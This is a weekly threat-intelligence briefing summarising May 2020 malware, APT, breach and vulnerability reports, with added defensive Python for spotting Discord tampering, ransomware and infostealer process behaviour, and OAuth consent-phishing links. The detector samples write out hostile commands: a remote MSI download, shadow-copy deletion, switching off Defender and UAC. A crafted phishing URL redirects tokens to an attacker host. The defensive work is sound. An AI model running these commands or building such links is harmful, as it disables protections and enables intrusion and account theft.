The threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: Android Malware, Bluetooth, Phishing, Winnti Group, WolfRAT, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this briefing and provide a glimpse of the threats discussed.
(published: May 24, 2020)
Recommendation: To determine whether a user's Discord client has been compromised by this latest version of AnarchyGrabber, inspect the client's "index.js" file at "%AppData%\Discord\[version]\modules\discord_desktop_core\index.js". A clean file consists of the single line "module.exports = require('./core.asar');"; if the file contains anything other than that line, the client is likely infected. Once an infection is identified, uninstall the client completely and reinstall it, then change the account password, which also invalidates the Discord token the Trojan steals. Also notify everyone on the affected user's friends list, as they may also have been targeted by the Trojan.
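One way to automate the index.js check, as an added example that is not part of the briefing or of Discord's own code, assuming the standard Windows install layout under %AppData%\Discord (the sample file bodies below are constructed, and the injected line is hypothetical):

```python
"""Check Discord's index.js for the tampering described above.

Added example, not part of the briefing or of Discord's own code. It assumes
the standard Windows layout %AppData%\\Discord\\<version>\\modules\\discord_desktop_core\\index.js
and treats anything other than the single expected line as suspicious.
"""
import os
import re
from pathlib import Path

# The only line a clean index.js should contain (from the briefing).
EXPECTED_LINE = "module.exports = require('./core.asar');"


def _meaningful_lines(text):
    """Non-blank lines with surrounding whitespace removed."""
    return [ln.strip() for ln in text.splitlines() if ln.strip()]


def index_js_is_clean(text):
    """True only if the file body is exactly the expected single line."""
    return _meaningful_lines(text) == [EXPECTED_LINE]


def suspicious_lines(text):
    """Every non-blank line that is not the expected line, for triage."""
    return [ln for ln in _meaningful_lines(text) if ln != EXPECTED_LINE]


def scan_discord(base_dir=None):
    """Report tampered index.js files under every Discord version directory.

    Returns a list of (path, suspicious_lines) tuples; an empty list means
    clean, or no Discord install under base_dir.
    """
    if base_dir is None:
        # %AppData% expands only on Windows; elsewhere the literal path
        # simply does not exist and the scan returns nothing.
        base_dir = os.path.expandvars(r"%AppData%\Discord")
    base = Path(base_dir)
    findings = []
    if not base.is_dir():
        return findings
    for version_dir in sorted(base.iterdir()):
        # Discord version folders are named like 1.0.9001
        if not re.fullmatch(r"\d+\.\d+\.\d+", version_dir.name):
            continue
        index_js = version_dir / "modules" / "discord_desktop_core" / "index.js"
        if not index_js.is_file():
            continue
        text = index_js.read_text(encoding="utf-8", errors="replace")
        if not index_js_is_clean(text):
            findings.append((str(index_js), suspicious_lines(text)))
    return findings


# Constructed sample bodies for illustration; the injected line is hypothetical,
# not copied from a real AnarchyGrabber3 sample.
CLEAN_SAMPLE = "module.exports = require('./core.asar');\n"
TAMPERED_SAMPLE = (
    "module.exports = require('./core.asar');\n"
    "require('./injected_loader.js');\n"
)

if __name__ == "__main__":
    findings = scan_discord()
    if not findings:
        print("no tampered index.js found (or Discord is not installed here)")
    for path, extra in findings:
        print(f"[!] tampered: {path}")
        for ln in extra:
            print(f"    {ln}")
```

Run it on the affected workstation; any reported line other than the expected require is what the reinstall removes, and it is worth keeping a copy for the incident record before wiping the client.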
MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] File Deletion - T1107 | [MITRE ATT&CK] User Execution - T1204 | [MITRE PRE-ATT&CK] Conduct social engineering - T1268 | [MITRE ATT&CK] Service Stop - T1489 | [MITRE ATT&CK] Steal Application Access Token - T1528
Tags: AnarchyGrabber3, Botnet, Discord, Password Stealer
(published: May 21, 2020)
The Ragnar Locker ransomware has been seen in recent attacks deploying itself inside a virtual machine on target systems, a new method of evading detection. The threat actors behind Ragnar Locker used a GPO task to run the Windows Installer (msiexec) and download an MSI package containing an installer for VirtualBox and a virtual disk image of Windows XP. The software and image are stored under "C:\Program Files (x86)\VirtualAppliances" to appear legitimate. The MSI installer also installs scripts that disable Windows AutoPlay notifications and delete any existing Volume Shadow Copies. The same script enumerates all local disks, mapped network drives, and removable drives and shares them with the virtual machine so the guest can reach them. The ransomware is executed by a batch file stored in the startup folder for persistence; once running inside the guest, it encrypts files on every drive enumerated earlier. The ransom note for each target is unique because the ransomware is compiled separately for each victim.
Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS). Because the encryption in this case runs inside a guest VM, host endpoint protection sees only a legitimate VirtualBox process; monitor for unexpected hypervisor installations, MSI packages fetched by msiexec from remote URLs, and shadow copy deletion. Always keep your important files backed up following the 3-2-1 rule: have at least 3 different copies, on 2 different mediums, with 1 off-site. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies, who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.
MITRE ATT&CK: [MITRE ATT&CK] Process Discovery - T1057 | [MITRE ATT&CK] Registry Run Keys / Startup Folder - T1060 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Network Share Discovery - T1135 | [MITRE ATT&CK] Signed Binary Proxy Execution - T1218 | [MITRE PRE-ATT&CK] Install and configure hardware, network, and systems - T1336 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Inhibit System Recovery - T1490
Tags: Ragnar Locker, Ransomware, Virtual Machine, Windows XP
(published: May 21, 2020)
A new variant of the information-stealing malware family "Raccoon" was discovered by Research Labs researchers masquerading as legitimate software. New samples impersonate legitimate programs including Bandicam and Revo Uninstaller. This version of the trojan is written in Borland Delphi and targets multiple browsers to collect sensitive data, as well as performing screen capture and logging users' keystrokes. Raccoon uses a PowerShell script to disable Windows Defender and modifies registry values to disable the User Account Control (UAC) admin approval prompt so that its payload can execute.
Recommendation: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training; in this case, PowerShell commands that change Windows Defender preferences and registry writes to the UAC policy keys are high-value signals. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network so that unusual traffic and connections to and from your network can be spotted and investigated as potential malicious activity.
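As an added example (not code from the briefing, from Sophos, or from either malware's reporting), the following Python flags the process behaviours described in both the Ragnar Locker story above and this Raccoon story from process-creation events such as Sysmon Event ID 1. The event fields, the Defender cmdlet, the registry value names and the sample events are assumptions constructed for illustration; the URL uses an RFC 5737 documentation address.

```python
"""Flag the process behaviours from the Ragnar Locker and Raccoon stories in
process-creation events (Sysmon Event ID 1 style).

Added example, not from the briefing or from either malware's reporting. The
event fields, the Defender cmdlet, the registry value names and the sample
events are assumptions constructed for illustration.
"""
import re

# (story, description, regex applied to "<image path> <command line>")
RULES = [
    ("Ragnar Locker", "msiexec fetching an MSI package from a remote URL",
     re.compile(r"\bmsiexec(?:\.exe)?\b.*\bhttps?://", re.I)),
    ("Ragnar Locker", "VirtualBox binary running from the VirtualAppliances directory",
     re.compile(r"\\virtualappliances\\.*\b(?:vbox\w*|virtualbox)\.exe\b", re.I)),
    ("Ragnar Locker", "Volume Shadow Copy deletion (Inhibit System Recovery, T1490)",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b"
                r"|\bwmic(?:\.exe)?\b.*\bshadowcopy\s+delete\b", re.I)),
    ("Raccoon", "PowerShell switching off a Windows Defender protection setting",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\bSet-MpPreference\b.*-Disable\w+\s+(?:\$true|1)\b", re.I)),
    ("Raccoon", "registry change disabling the UAC admin approval prompt",
     re.compile(r"\\Policies\\System\b.*\b(?:EnableLUA|ConsentPromptBehaviorAdmin)\b.*/d\s+0\b", re.I)),
]


def detect(events):
    """Return (event id, story, description) for every rule an event trips."""
    hits = []
    for ev in events:
        haystack = f"{ev.get('image', '')} {ev.get('cmdline', '')}"
        for story, desc, rx in RULES:
            if rx.search(haystack):
                hits.append((ev["id"], story, desc))
    return hits


# Constructed sample events: five malicious, two benign look-alikes.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://198.51.100.7/update.msi /qn"},
    {"id": 2, "image": r"C:\Program Files (x86)\VirtualAppliances\VBoxHeadless.exe",
     "cmdline": r"VBoxHeadless.exe --startvm micro"},
    {"id": 3, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": r"vssadmin.exe delete shadows /all /quiet"},
    {"id": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -nop -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"id": 5, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    # Benign: VirtualBox from its normal install path, and a local MSI install.
    {"id": 6, "image": r"C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe",
     "cmdline": r"VBoxHeadless.exe --startvm dev-ubuntu"},
    {"id": 7, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi /qn"},
]

if __name__ == "__main__":
    for event_id, story, desc in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: [{story}] {desc}")
```

The benign events show the intended precision: VirtualBox under its normal Oracle path and a locally sourced MSI are not flagged, while the same binaries in the attacker's pattern are.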
MITRE ATT&CK: [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] PowerShell - T1086 | [MITRE ATT&CK] Disabling Security Tools - T1089 | [MITRE ATT&CK] Custom Command and Control Protocol - T1094 | [MITRE ATT&CK] Screen Capture - T1113 | [MITRE ATT&CK] Credentials from Web Browsers - T1503
Tags: Raccoon, Information Stealer, Screen Capture, Input Capture
(published: May 21, 2020)
Researchers at ESET (WeLiveSecurity) have detected a new modular backdoor named "PipeMon" that is being used by the China-based Advanced Persistent Threat (APT) group "Winnti Group." Winnti is using PipeMon to target video game companies in South Korea and Taiwan. The backdoor was signed with a code-signing certificate stolen from a video game company and gains persistence by registering itself as a Windows print processor.
Recommendation: As this story portrays, it is important that your company institute policies regarding the software in use and its proper maintenance. New security updates should be applied as soon as possible, because they often fix minor bugs and critical vulnerabilities that delay workflow or can be exploited by malicious actors. Third-party software vendors must regularly verify that their software is secure so that customers do not fall victim to cyber threats through the vendor's own vulnerabilities. Stolen code-signing certificates are a common vehicle for supply-chain attacks; certificate holders must keep signing keys under strict control (ideally in a hardware security module) and ensure that only authenticated and authorized individuals can sign.
MITRE ATT&CK: [MITRE ATT&CK] Port Monitors - T1013 | [MITRE ATT&CK] Access Token Manipulation - T1134 | [MITRE ATT&CK] Bypass User Account Control - T1088 | [MITRE ATT&CK] Parent PID Spoofing - T1502 | [MITRE ATT&CK] Code Signing - T1116 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Process Discovery - T1057 | [MITRE ATT&CK] Security Software Discovery - T1063 | [MITRE ATT&CK] Screen Capture - T1113 | [MITRE ATT&CK] Commonly Used Port - T1043 | [MITRE ATT&CK] Standard Non-Application Layer Protocol - T1095 | [MITRE ATT&CK] Standard Cryptographic Protocol - T1032 | [MITRE ATT&CK] Fallback Channels - T1008
Tags: Winnti Group, PipeMon, Backdoor, South Korea, Taiwan
(published: May 20, 2020)
Proofpoint researchers have identified new versions of ZLoader, a variant of the Zeus banking trojan that has been active since December 2019. Targeted countries include Australia, Canada, Germany, Poland, and the U.S.A. Email lures used for ZLoader have incorporated COVID-19 prevention and testing scams as well as fake invoices. Between December 2019 and the time of reporting, 25 versions of ZLoader were identified. The trojan contains multiple mechanisms to evade detection and to hinder reverse engineering. It attempts to steal user credentials from web browsers and uses HTTP POST requests to communicate with its Command and Control (C2) server. ZLoader can also steal browser cookies, delete itself, and block user access to certain URLs. Later versions employ a Domain Generation Algorithm (DGA) as a fallback when the malware cannot initially reach its configured C2.
Recommendation: All employees should be educated on the risks of phishing, specifically how to identify such attempts that exploit recent and ongoing events like the COVID-19 pandemic, and whom to contact if a phishing attack is identified. Emails that ask the recipient to follow a link that then requests credentials are often an indicator of a phishing attack.
MITRE ATT&CK: [MITRE ATT&CK] Custom Command and Control Protocol - T1094 | [MITRE ATT&CK] File Deletion - T1107 | [MITRE ATT&CK] Spearphishing Link - T1192 | [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Credentials from Web Browsers - T1503 | [MITRE ATT&CK] Steal Web Session Cookie - T1539
Tags: ZLoader, Banking Trojan, Spearphishing
(published: May 20, 2020)
Out-of-band security updates have been released for Adobe Character Animator, Premiere Pro, Audition, and Premiere Rush. The Character Animator vulnerability, CVE-2020-9586, is a critical buffer overflow that could allow a threat actor to execute arbitrary code on a target system. The Premiere Pro, Audition, and Premiere Rush vulnerabilities are out-of-bounds read flaws that could disclose sensitive information from process memory to a threat actor.
Recommendation: It is important that your company has patch-maintenance policies in place, particularly when there are Bring Your Own Device (BYOD) policies in use. Once vulnerabilities have been reported on in open sources, threat actors will likely attempt to incorporate the exploitation of the vulnerability into their malicious operations. Patches should be reviewed and applied as soon as possible to prevent potential malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203
Tags: Adobe, Remote Code Execution, Information Disclosure, CVE-2020-9586, CVE-2020-9616, CVE-2020-9617, CVE-2020-9618
(published: May 19, 2020)
The Advanced Persistent Threat (APT) group "Greenbug" has been seen targeting telecommunication companies in South Asia as recently as April 2020, using spearphishing campaigns to gain initial access. The group uses off-the-shelf tools and open-source techniques in espionage operations focused on reaching database servers and stealing credentials for later access. The group is potentially linked to Iran and has connections to the Shamoon group, which has conducted wiping operations against organizations in Saudi Arabia. Greenbug was found to be present on systems before the Shamoon group wiped them, raising the likelihood of collaboration between the two groups in which Greenbug supplies the Shamoon group with credentials for the target systems it wipes.
Recommendation: Databases should not be directly accessible over, or connected to, the internet. Protect these services with authentication, and do not allow guest or anonymous login. For web applications that access database data, make sure all user-supplied data is sanitized to prevent SQL injection. Even if the activity of Greenbug and the Shamoon group is not linked, database credentials should be rotated regularly and immediately after any suspected compromise, and remote backup copies should be kept in case systems are compromised or wiped.
MITRE ATT&CK: [MITRE ATT&CK] PowerShell - T1086 | [MITRE ATT&CK] System Network Configuration Discovery - T1016 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] User Execution - T1204 | [MITRE PRE-ATT&CK] Upload, install, and configure software/tools - T1362
Tags: Greenbug, Telecommunication, Open-Source, Credential Access
(published: May 19, 2020)
A modified version of the Android Remote Access Tool (RAT) DenDroid, called "WolfRAT," has been targeting Android users in Thailand, as discovered by researchers at Cisco Talos. The modified RAT targets messaging applications including Facebook Messenger, Line, and WhatsApp; Talos linked it to DenDroid because of strong overlaps in the Command and Control (C2) infrastructure used. The RAT is attributed to a German-based company called "Wolf Research," which is known for selling malware and spyware to governments around the world. WolfRAT masquerades as a Flash update, Google Play, or a Google service to collect sensitive information from Android users. The malware is unsophisticated, with much of its code copied and pasted from open sources. After Wolf Research was publicly reported on, the company shut down but soon resurfaced in Cyprus under the name "LokD."
Recommendation: It is important to only use the Google Play Store to obtain your software (for Android users), and avoid installing software from unverified sources because it is easier for malicious applications to get into third-party stores. Applications that ask for additional permissions outside of their normal functionality should be treated with suspicion, and normal functionality for the applications should be reviewed carefully prior to installation. Antivirus applications, if available, should be deployed on devices, particularly those that could contain sensitive information.
Tags: Android, Spyware, WolfRAT, Thailand
(published: May 19, 2020)
The threat group CIRCUS SPIDER is moving away from phishing campaigns as the way to distribute its NetWalker ransomware and is now relying on network intrusions against specific large businesses only. On April 19, 2020, the group was seen posting job advertisements on a Russian hacking forum seeking individuals with network intrusion experience to join as affiliates. The advertisement specified that an affiliate must always restore user files once a ransom has been paid and must not target Russia or the Commonwealth of Independent States (CIS).
Recommendation: With ransomware, individuals must always run antivirus and endpoint protection software to assist in preventing ransomware infection. Maintain secure backups of all your important files to avoid the need to consider payment for the decryption key, and implement a business continuity plan in the unfortunate case of ransomware infection. In the case of ransomware infection, the affected systems should be wiped and reformatted, even if the ransom is paid. Other machines on the same network should be scanned for other potential infections.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: NetWalker, Ransomware, RaaS, Enterprise
(published: May 19, 2020)
The British airline EasyJet has disclosed that the email addresses and travel details of an estimated nine million customers were accessed by unauthorized individuals. The credit card data of 2,208 customers was also accessed during the compromise. EasyJet became aware of the malicious activity in January 2020 but only began informing customers about the breach in late April.
Recommendation: Leaks of this sort may put affected individuals at greater risk of phishing attacks, since actors can use the stolen details to craft convincing custom emails. Individuals whose accounts are associated with this incident should change their passwords as soon as possible, particularly if the same passwords are used for other online accounts. Individuals should also regularly monitor their credit reports for suspicious activity or consider an identity theft protection service.
MITRE ATT&CK: [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] User Execution - T1204
Tags: EasyJet, Data Breach, PII
(published: May 18, 2020)
A vulnerability has been found in the Bluetooth Classic (BR/EDR) protocol that allows a threat actor within radio range to impersonate a device the victim has previously paired with. Registered as CVE-2020-10135 and named the Bluetooth Impersonation AttackS (BIAS), it affects modern devices that support Bluetooth pairing, including IoT devices, laptops, smartphones, and tablets. The issue lies in how a previously paired device is authenticated when it reconnects: the long-term link key established at pairing is meant to prove the device's identity, but authentication of the post-bonding connection is not properly enforced, so an attacker can masquerade as a bonded device and complete authentication without possessing the link key. Bluetooth chips from Apple, CSR, Cypress, Intel, Samsung, and Qualcomm were all found vulnerable to BIAS unless patched.
Recommendation: Since the reporting of CVE-2020-10135, the Bluetooth Special Interest Group (SIG), which maintains the Bluetooth standard, has published guidance and specification updates intended to prevent BIAS attacks, and chip and device vendors are releasing patches that implement them. All devices should be kept up to date with the latest software versions to benefit from these fixes. Additionally, only trusted devices should be connected to via Bluetooth, and Bluetooth should be turned off when not in use; note that BIAS impersonates a device the victim already trusts, so patching is the primary mitigation.
MITRE ATT&CK: [MITRE ATT&CK] Peripheral Device Discovery - T1120
Tags: Bluetooth, CVE-2020-10135, Apple, Intel, Samsung
(published: May 18, 2020)
Researchers from Cisco Talos have identified two vulnerabilities in the Nitro Pro PDF reader, registered as "CVE-2020-6074" and "CVE-2020-6092." The first is a remote code execution flaw: a crafted PDF document triggers an integer overflow in the PDF parser, which a threat actor can use to execute arbitrary code. The second relates to how the affected version of Nitro Pro handles XML errors: a crafted PDF document causes access to uninitialized memory, resulting in information disclosure. Both vulnerabilities can only be exploited once a user opens the malicious document, which would most likely be delivered via a spearphishing campaign.
Recommendation: With these vulnerabilities likely to be exploited through spearphishing, individuals should be educated on the risks of it, specifically, how to identify such attempts and whom to contact if a phishing email is identified. Emails that request that the recipient follow a link or open an attachment can often be indicative of a spearphishing attack. Once vulnerabilities have been reported on in open sources like this, threat actors will likely attempt to incorporate the exploitation of the vulnerability into their malicious operations. Patches should be reviewed and applied as soon as possible to prevent potential malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] User Execution - T1204
Tags: Nitro Pro PDF Reader, CVE-2020-6074, CVE-2020-6092, Remote Code Execution
(published: May 18, 2020)
Researchers at Cofense have identified a spearphishing campaign that abuses the OAuth2 framework and the OpenID Connect (OIDC) protocol to gain access to victims' Office 365 data. The emails masquerade as notices of a bonus for the work quarter and ask users to open a SharePoint-hosted file, which leads to what appears to be a legitimate Microsoft Office 365 login page. Microsoft uses OIDC to authenticate the user and OAuth2 to authorize access to Office 365 data, issuing access tokens to the requesting application. The threat actors modify the authorization URL so that the authorization code and tokens returned after login are redirected to the attacker-controlled site hxxps://officehnoc[.]com/office, which masquerades as a legitimate Office 365 page. The scope parameter in the URL requests permissions that let the threat actors access the victim's mailbox while the user is offline, read the contact list, and read email. Because the user authenticates on the genuine Microsoft login page, multi-factor authentication completes normally and does not prevent the token from being delivered to the attacker.
Recommendation: Spearphishing emails represent a significant security risk because the sending address will often appear legitimate to the target; sometimes a company email account is compromised and used to send them. Education is the best defense: inform employees what to expect in information requests from their managers and colleagues, and make sure they know whom to contact when they suspect they are the target of a spearphishing attack. Tenant administrators should also review which third-party applications users have consented to and consider restricting user consent to unverified applications, which can stop the attacker's application from obtaining a token even when the user clicks the link.
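As an added example (not code from the briefing or from Cofense), the following Python parses an OAuth2 authorization URL and flags the two manipulations described above: a redirect_uri pointing away from Microsoft and a scope requesting standing mailbox access. The trusted redirect host list, the scope names and both sample URLs are assumptions; the samples are constructed, with the attacker host taken from the story and kept defanged.

```python
"""Triage an OAuth2/OIDC authorization link of the kind used in the consent
phishing described above.

Added example, not from the briefing or from Cofense. The trusted redirect
hosts, the scope names and both sample URLs are assumptions; the samples are
constructed, with the attacker host taken from the story and kept defanged.
"""
from urllib.parse import parse_qs, urlsplit

# Where a legitimate Office 365 sign-in is expected to send the code or token.
# Assumption: extend with your tenant's own registered redirect hosts.
TRUSTED_REDIRECT_HOSTS = {
    "login.microsoftonline.com",
    "www.office.com",
    "outlook.office.com",
    "outlook.office365.com",
}

# Scopes that give an application standing access to mail and contacts, plus a
# refresh token (offline_access) that keeps working after the user logs out.
HIGH_RISK_SCOPES = {
    "offline_access", "mail.read", "mail.readwrite",
    "contacts.read", "contacts.readwrite", "files.read.all",
}


def refang(url):
    """Turn a defanged indicator (hxxps, [.]) back into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def analyze_authorize_url(url):
    """Parse an authorization URL and list the reasons it looks abusive."""
    parts = urlsplit(refang(url))
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    reasons = []

    if not (parts.netloc.lower() == "login.microsoftonline.com"
            and parts.path.endswith("/authorize")):
        reasons.append("not a login.microsoftonline.com authorize endpoint")

    redirect_host = urlsplit(params.get("redirect_uri", "")).netloc.lower()
    if redirect_host and redirect_host not in TRUSTED_REDIRECT_HOSTS:
        reasons.append(f"redirect_uri delivers the code/token to {redirect_host}")

    # Graph scopes may be written as full URIs; keep only the last path segment.
    scopes = {s.lower().rsplit("/", 1)[-1] for s in params.get("scope", "").split()}
    risky = sorted(scopes & HIGH_RISK_SCOPES)
    if risky:
        reasons.append("requests standing data access: " + ", ".join(risky))

    if "token" in params.get("response_type", "").split():
        reasons.append("implicit flow: access token returned directly in the redirect")

    return {"redirect_host": redirect_host, "scopes": sorted(scopes), "reasons": reasons}


def looks_like_consent_phish(url):
    """Convenience verdict: any reason at all makes the link worth blocking."""
    return bool(analyze_authorize_url(url)["reasons"])


# Constructed sample: a genuine Microsoft authorize endpoint whose redirect_uri
# and scope have been altered as in the story (client_id is a placeholder).
SAMPLE_PHISH_URL = (
    "hxxps://login.microsoftonline[.]com/common/oauth2/v2.0/authorize"
    "?client_id=11111111-2222-3333-4444-555555555555"
    "&response_type=code"
    "&redirect_uri=hxxps://officehnoc[.]com/office"
    "&scope=openid+profile+offline_access+contacts.read+mail.read"
    "&state=bonus"
)

# Constructed sample of an unremarkable sign-in request for comparison.
SAMPLE_LEGIT_URL = (
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=11111111-2222-3333-4444-555555555555"
    "&response_type=code"
    "&redirect_uri=https://www.office.com/landing"
    "&scope=openid+profile"
)

if __name__ == "__main__":
    for label, url in (("phish", SAMPLE_PHISH_URL), ("legit", SAMPLE_LEGIT_URL)):
        result = analyze_authorize_url(url)
        print(f"{label}: redirect -> {result['redirect_host'] or '-'}; "
              f"reasons: {result['reasons'] or 'none'}")
```

The point the page makes is visible in the output: the phishing link really is a login.microsoftonline.com URL, so host-based URL filtering passes it; only the redirect_uri and scope parameters give it away, which is why mail gateways and proxies should inspect those parameters rather than the domain alone.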
MITRE ATT&CK: [MITRE ATT&CK] Email Collection - T1114 | [MITRE ATT&CK] Spearphishing Link - T1192 | [MITRE ATT&CK] User Execution - T1204 | [MITRE PRE-ATT&CK] Conduct social engineering - T1268
Tags: Microsoft Office 365, MFA Bypass, OAuth2, OIDC